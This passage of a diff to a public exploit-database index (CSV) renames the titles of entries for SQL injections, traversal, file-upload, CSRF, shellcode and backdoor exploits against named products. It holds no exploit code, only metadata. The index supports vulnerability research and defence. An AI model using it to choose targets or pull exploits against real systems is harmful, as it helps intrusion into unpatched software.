Bypass",2014-03-09,IRH,multiple,remote,0 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x - 'ajax.autosave.php' Multiple SQL Injection",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 -39118,platforms/php/webapps/39118.html,"osCmax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 +39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0 39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0 -39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0 +39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 @@ -35382,28 +35385,28 @@ id,file,description,date,author,platform,type,port 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0 -39135,platforms/php/webapps/39135.php,"Wordpress Felici Theme - 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 +39135,platforms/php/webapps/39135.php,"WordPress Felici Theme - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 -39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 -39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39144,platforms/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 -39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 +39147,platforms/osx/local/39147.c,"Apple Mac OS X - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0 39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash (PoC)",2016-01-12,"Daniel Velazquez",windows,dos,0 -39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0 +39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",hardware,remote,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 -39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - password.cgi Admin Password Manipulation Cross-Site Request Forgery",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 +39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - Password.cgi Admin Password manipulation Cross-Site Request Forgery",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 @@ -35439,18 +35442,18 @@ id,file,description,date,author,platform,type,port 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39190,platforms/php/webapps/39190.php,"Wordpress cnhk-slideshow Plugin - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 +39190,platforms/php/webapps/39190.php,"WordPress cnhk-Slideshow Plugin - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L - Arbitrary File Upload",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 39196,platforms/linux/remote/39196.py,"Apache 'mod_wsgi' Module - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 -39197,platforms/php/webapps/39197.txt,"Wordpress Booking System (Booking Calendar) Plugin - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 +39197,platforms/php/webapps/39197.txt,"WordPress Booking System (Booking Calendar) Plugin - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps,0 39198,platforms/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps,0 39199,platforms/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps,0 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 -39373,platforms/osx/dos/39373.c,"OS X Kernel - no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 +39373,platforms/osx/dos/39373.c,"Apple Mac OS X - Kernel no-more-senders Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39202,platforms/php/webapps/39202.txt,"WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 @@ -35460,46 +35463,46 @@ id,file,description,date,author,platform,type,port 39208,platforms/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 -39211,platforms/php/webapps/39211.txt,"Wordpress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 -39212,platforms/php/webapps/39212.txt,"Wordpress JW Player for Flash & HTML5 Video Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 -39213,platforms/php/webapps/39213.txt,"Wordpress Featured Comments Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39211,platforms/php/webapps/39211.txt,"WordPress Infocus Theme - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 +39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 +39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash (PoC)",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0 -39218,platforms/windows/remote/39218.html,"TrendMicro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 +39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 -39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 +39224,platforms/hardware/remote/39224.py,"Fortigate OS Version 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 -39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0 +39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with WMALFXGFXDSP.dll (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 -39237,platforms/php/webapps/39237.txt,"Wordpress NextGEN Gallery 1.9.1 Plugin - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 +39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery 1.9.1 Plugin - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps,0 -39240,platforms/php/webapps/39240.txt,"Wordpress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 -39241,platforms/java/webapps/39241.py,"Glassfish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 +39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin - 'wp-admin/admin.php' Multiple SQL Injection",2014-07-09,"Claudio Viviani",php,webapps,0 +39241,platforms/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash (PoC)",2016-01-15,"Abraham Espinosa",windows,dos,0 39243,platforms/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0 -39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 +39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80 -39250,platforms/php/webapps/39250.txt,"Wordpress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 -39251,platforms/php/webapps/39251.txt,"Wordpress BookX Plugin - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 -39252,platforms/php/webapps/39252.txt,"Wordpress WP Rss Poster Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39253,platforms/php/webapps/39253.txt,"Wordpress ENL Newsletter Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39254,platforms/php/webapps/39254.html,"Wordpress CopySafe PDF Protection Plugin - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 +39250,platforms/php/webapps/39250.txt,"WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0 +39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 +39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39253,platforms/php/webapps/39253.txt,"WordPress ENL NewsLetter Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 -39256,platforms/php/webapps/39256.txt,"Tera Charts - (tera-charts) Plugin for Wordpress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 -39257,platforms/php/webapps/39257.txt,"Tera Charts - (tera-charts) Plugin for Wordpress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 +39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 +39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 @@ -35507,13 +35510,13 @@ id,file,description,date,author,platform,type,port 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 -39371,platforms/osx/dos/39371.c,"OSX - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 -39372,platforms/osx/dos/39372.c,"OSX - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 +39371,platforms/osx/dos/39371.c,"Apple Mac OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0 +39372,platforms/osx/dos/39372.c,"Apple Mac OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 -39269,platforms/php/webapps/39269.txt,"Wordpress Lead Octopus Power Plugin - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 -39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for Wordpress - options-general.php Option Manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 +39269,platforms/php/webapps/39269.txt,"WordPress Lead Octopus Power Plugin - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 +39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress - options-general.php Option manipulation Cross-Site Request Forgery",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 @@ -35522,47 +35525,47 @@ id,file,description,date,author,platform,type,port 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0 40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 -39279,platforms/php/webapps/39279.txt,"Wordpress wpSS Plugin - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 -39280,platforms/php/webapps/39280.txt,"Wordpress HDW Player Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 +39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 +39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0 -39282,platforms/php/webapps/39282.txt,"Wordpress GB Gallery Slideshow Plugin - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 -39283,platforms/php/webapps/39283.txt,"Wordpress FB Gorilla Plugin - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 +39282,platforms/php/webapps/39282.txt,"WordPress GB Gallery Slideshow Plugin - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0 +39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0 -39287,platforms/php/webapps/39287.txt,"Wordpress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 +39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 -39291,platforms/php/webapps/39291.txt,"Wordpress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 +39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (64bit) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 -39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute-force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 +39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 -39296,platforms/php/webapps/39296.txt,"Wordpress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39297,platforms/php/webapps/39297.txt,"Wordpress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39298,platforms/php/webapps/39298.txt,"Wordpress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39299,platforms/php/webapps/39299.txt,"Wordpress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 -39300,platforms/php/webapps/39300.txt,"Wordpress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 -39301,platforms/php/webapps/39301.html,"Wordpress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39302,platforms/php/webapps/39302.html,"Wordpress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39303,platforms/php/webapps/39303.txt,"Wordpress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 -39304,platforms/php/webapps/39304.txt,"Wordpress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 +39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 +39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 